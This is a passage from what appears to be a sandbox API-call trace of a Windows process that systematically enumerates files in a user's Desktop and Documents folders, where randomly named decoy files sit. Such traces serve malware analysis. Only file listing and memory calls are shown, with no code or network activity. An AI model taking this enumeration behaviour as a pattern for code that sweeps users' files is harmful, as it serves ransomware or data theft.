nFileSizeLow=0x100eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-RvZ.flv", cAlternateFileName="")) returned 1 [0227.769] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91349080, ftCreationTime.dwHighDateTime=0x1d5e206, ftLastAccessTime.dwLowDateTime=0x7173f270, ftLastAccessTime.dwHighDateTime=0x1d5dc31, ftLastWriteTime.dwLowDateTime=0x7173f270, ftLastWriteTime.dwHighDateTime=0x1d5dc31, nFileSizeHigh=0x0, nFileSizeLow=0x7f15, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4jworgauj.bmp", cAlternateFileName="4JWORG~1.BMP")) returned 1 [0227.769] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d868d20, ftCreationTime.dwHighDateTime=0x1d5e521, ftLastAccessTime.dwLowDateTime=0xb515b480, ftLastAccessTime.dwHighDateTime=0x1d5e0a2, ftLastWriteTime.dwLowDateTime=0xb515b480, ftLastWriteTime.dwHighDateTime=0x1d5e0a2, nFileSizeHigh=0x0, nFileSizeLow=0x11133, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iICxrqLlbVh.m4a", cAlternateFileName="IICXRQ~1.M4A")) returned 1 [0227.769] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70fd0b10, ftCreationTime.dwHighDateTime=0x1d5e771, ftLastAccessTime.dwLowDateTime=0x5a82fbc0, ftLastAccessTime.dwHighDateTime=0x1d5ddcf, ftLastWriteTime.dwLowDateTime=0x5a82fbc0, ftLastWriteTime.dwHighDateTime=0x1d5ddcf, nFileSizeHigh=0x0, nFileSizeLow=0xbb81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JnCykkanbvIZuzN.gif", cAlternateFileName="JNCYKK~1.GIF")) returned 1 [0227.769] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70fd0b10, ftCreationTime.dwHighDateTime=0x1d5e771, ftLastAccessTime.dwLowDateTime=0x5a82fbc0, ftLastAccessTime.dwHighDateTime=0x1d5ddcf, ftLastWriteTime.dwLowDateTime=0x5a82fbc0, ftLastWriteTime.dwHighDateTime=0x1d5ddcf, nFileSizeHigh=0x0, nFileSizeLow=0xbb81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JnCykkanbvIZuzN.gif", cAlternateFileName="JNCYKK~1.GIF")) returned 0 [0227.769] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0227.770] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.770] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\74 ZPVMU\\") returned="74 ZPVMU\\" [0227.770] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0227.770] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.770] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.770] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.770] PathFindFileNameW (pszPath="") returned="" [0227.770] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\74 ZPVMU\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd766b20, ftCreationTime.dwHighDateTime=0x1d5e4ac, ftLastAccessTime.dwLowDateTime=0x334a4df0, ftLastAccessTime.dwHighDateTime=0x1d5dea7, ftLastWriteTime.dwLowDateTime=0x334a4df0, ftLastWriteTime.dwHighDateTime=0x1d5dea7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd10 | out: hHeap=0x630000) returned 1 [0227.771] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd766b20, ftCreationTime.dwHighDateTime=0x1d5e4ac, ftLastAccessTime.dwLowDateTime=0x334a4df0, ftLastAccessTime.dwHighDateTime=0x1d5dea7, ftLastWriteTime.dwLowDateTime=0x334a4df0, ftLastWriteTime.dwHighDateTime=0x1d5dea7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.771] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86e55fc0, ftCreationTime.dwHighDateTime=0x1d5df4e, ftLastAccessTime.dwLowDateTime=0x60692bd0, ftLastAccessTime.dwHighDateTime=0x1d5dec0, ftLastWriteTime.dwLowDateTime=0x60692bd0, ftLastWriteTime.dwHighDateTime=0x1d5dec0, nFileSizeHigh=0x0, nFileSizeLow=0x8e8d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0FzPFdGAHuuuKllKc sv.flv", cAlternateFileName="0FZPFD~1.FLV")) returned 1 [0227.771] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19dc1d20, ftCreationTime.dwHighDateTime=0x1d5e6e6, ftLastAccessTime.dwLowDateTime=0x8da836a0, ftLastAccessTime.dwHighDateTime=0x1d5e220, ftLastWriteTime.dwLowDateTime=0x8da836a0, ftLastWriteTime.dwHighDateTime=0x1d5e220, nFileSizeHigh=0x0, nFileSizeLow=0xa2db, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HfHAO43nG1N.ppt", cAlternateFileName="HFHAO4~1.PPT")) returned 1 [0227.771] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19dc1d20, ftCreationTime.dwHighDateTime=0x1d5e6e6, ftLastAccessTime.dwLowDateTime=0x8da836a0, ftLastAccessTime.dwHighDateTime=0x1d5e220, ftLastWriteTime.dwLowDateTime=0x8da836a0, ftLastWriteTime.dwHighDateTime=0x1d5e220, nFileSizeHigh=0x0, nFileSizeLow=0xa2db, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HfHAO43nG1N.ppt", cAlternateFileName="HFHAO4~1.PPT")) returned 0 [0227.771] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0227.771] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.771] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\") returned="wzVrnoY3pfgm5\\" [0227.771] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0227.771] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.771] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.771] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.771] PathFindFileNameW (pszPath="") returned="" [0227.771] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x489bacc0, ftCreationTime.dwHighDateTime=0x1d5e19b, ftLastAccessTime.dwLowDateTime=0x4e00a8e0, ftLastAccessTime.dwHighDateTime=0x1d5e21e, ftLastWriteTime.dwLowDateTime=0x4e00a8e0, ftLastWriteTime.dwHighDateTime=0x1d5e21e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede00 | out: hHeap=0x630000) returned 1 [0227.773] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x489bacc0, ftCreationTime.dwHighDateTime=0x1d5e19b, ftLastAccessTime.dwLowDateTime=0x4e00a8e0, ftLastAccessTime.dwHighDateTime=0x1d5e21e, ftLastWriteTime.dwLowDateTime=0x4e00a8e0, ftLastWriteTime.dwHighDateTime=0x1d5e21e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.773] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59b1b0a0, ftCreationTime.dwHighDateTime=0x1d5dce0, ftLastAccessTime.dwLowDateTime=0x7a435e30, ftLastAccessTime.dwHighDateTime=0x1d5e682, ftLastWriteTime.dwLowDateTime=0x7a435e30, ftLastWriteTime.dwHighDateTime=0x1d5e682, nFileSizeHigh=0x0, nFileSizeLow=0x18859, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e8KJIm_.wav", cAlternateFileName="")) returned 1 [0227.773] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99dcb980, ftCreationTime.dwHighDateTime=0x1d5d7f0, ftLastAccessTime.dwLowDateTime=0x8fa5ec40, ftLastAccessTime.dwHighDateTime=0x1d5db9a, ftLastWriteTime.dwLowDateTime=0x8fa5ec40, ftLastWriteTime.dwHighDateTime=0x1d5db9a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iIWj9EjHStmpO_L", cAlternateFileName="IIWJ9E~1")) returned 1 [0227.773] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3faa330, ftCreationTime.dwHighDateTime=0x1d5e2ce, ftLastAccessTime.dwLowDateTime=0x24cbb8f0, ftLastAccessTime.dwHighDateTime=0x1d5d84d, ftLastWriteTime.dwLowDateTime=0x24cbb8f0, ftLastWriteTime.dwHighDateTime=0x1d5d84d, nFileSizeHigh=0x0, nFileSizeLow=0xea5e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j2ptz8I.pptx", cAlternateFileName="J2PTZ8~1.PPT")) returned 1 [0227.773] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e73adb0, ftCreationTime.dwHighDateTime=0x1d5e70d, ftLastAccessTime.dwLowDateTime=0x93013600, ftLastAccessTime.dwHighDateTime=0x1d5daba, ftLastWriteTime.dwLowDateTime=0x93013600, ftLastWriteTime.dwHighDateTime=0x1d5daba, nFileSizeHigh=0x0, nFileSizeLow=0x12d34, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K151dM.swf", cAlternateFileName="")) returned 1 [0227.773] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51bda190, ftCreationTime.dwHighDateTime=0x1d5dcd3, ftLastAccessTime.dwLowDateTime=0xa1293010, ftLastAccessTime.dwHighDateTime=0x1d5de62, ftLastWriteTime.dwLowDateTime=0xa1293010, ftLastWriteTime.dwHighDateTime=0x1d5de62, nFileSizeHigh=0x0, nFileSizeLow=0x11c57, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WOO6cFBQofqEBI.m4a", cAlternateFileName="WOO6CF~1.M4A")) returned 1 [0227.773] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6238000, ftCreationTime.dwHighDateTime=0x1d5dbd7, ftLastAccessTime.dwLowDateTime=0x9b31b7a0, ftLastAccessTime.dwHighDateTime=0x1d5e695, ftLastWriteTime.dwLowDateTime=0x9b31b7a0, ftLastWriteTime.dwHighDateTime=0x1d5e695, nFileSizeHigh=0x0, nFileSizeLow=0xe742, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XOigXkWrr1j.mp3", cAlternateFileName="XOIGXK~1.MP3")) returned 1 [0227.773] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6238000, ftCreationTime.dwHighDateTime=0x1d5dbd7, ftLastAccessTime.dwLowDateTime=0x9b31b7a0, ftLastAccessTime.dwHighDateTime=0x1d5e695, ftLastWriteTime.dwLowDateTime=0x9b31b7a0, ftLastWriteTime.dwHighDateTime=0x1d5e695, nFileSizeHigh=0x0, nFileSizeLow=0xe742, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XOigXkWrr1j.mp3", cAlternateFileName="XOIGXK~1.MP3")) returned 0 [0227.774] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd10 | out: hHeap=0x630000) returned 1 [0227.774] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.774] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0227.775] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0227.775] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.775] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.775] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.775] PathFindFileNameW (pszPath="") returned="" [0227.775] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6238000, ftCreationTime.dwHighDateTime=0x1d5dbd7, ftLastAccessTime.dwLowDateTime=0x9b31b7a0, ftLastAccessTime.dwHighDateTime=0x1d5e695, ftLastWriteTime.dwLowDateTime=0x9b31b7a0, ftLastWriteTime.dwHighDateTime=0x1d5e695, nFileSizeHigh=0x0, nFileSizeLow=0xe742, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XOigXkWrr1j.mp3", cAlternateFileName="XOIGXK~1.MP3")) returned 0xffffffff [0227.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc20 | out: hHeap=0x630000) returned 1 [0227.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd10 | out: hHeap=0x630000) returned 1 [0227.775] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.775] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0227.775] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0227.775] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.775] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.775] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.776] PathFindFileNameW (pszPath="") returned="" [0227.776] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6238000, ftCreationTime.dwHighDateTime=0x1d5dbd7, ftLastAccessTime.dwLowDateTime=0x9b31b7a0, ftLastAccessTime.dwHighDateTime=0x1d5e695, ftLastWriteTime.dwLowDateTime=0x9b31b7a0, ftLastWriteTime.dwHighDateTime=0x1d5e695, nFileSizeHigh=0x0, nFileSizeLow=0xe742, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XOigXkWrr1j.mp3", cAlternateFileName="XOIGXK~1.MP3")) returned 0xffffffff [0227.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc20 | out: hHeap=0x630000) returned 1 [0227.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd10 | out: hHeap=0x630000) returned 1 [0227.776] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.776] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0227.776] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0227.776] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.776] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.776] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.776] PathFindFileNameW (pszPath="") returned="" [0227.776] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc20 | out: hHeap=0x630000) returned 1 [0227.777] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.777] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0227.777] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0227.777] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0227.777] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0227.777] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd10 | out: hHeap=0x630000) returned 1 [0227.777] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.777] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0227.778] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0227.778] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.778] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.778] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.778] PathFindFileNameW (pszPath="") returned="" [0227.778] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0227.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede00 | out: hHeap=0x630000) returned 1 [0227.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd10 | out: hHeap=0x630000) returned 1 [0227.778] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.778] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0227.778] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0227.778] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.778] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.778] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.778] PathFindFileNameW (pszPath="") returned="" [0227.778] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede00 | out: hHeap=0x630000) returned 1 [0227.779] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.779] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, 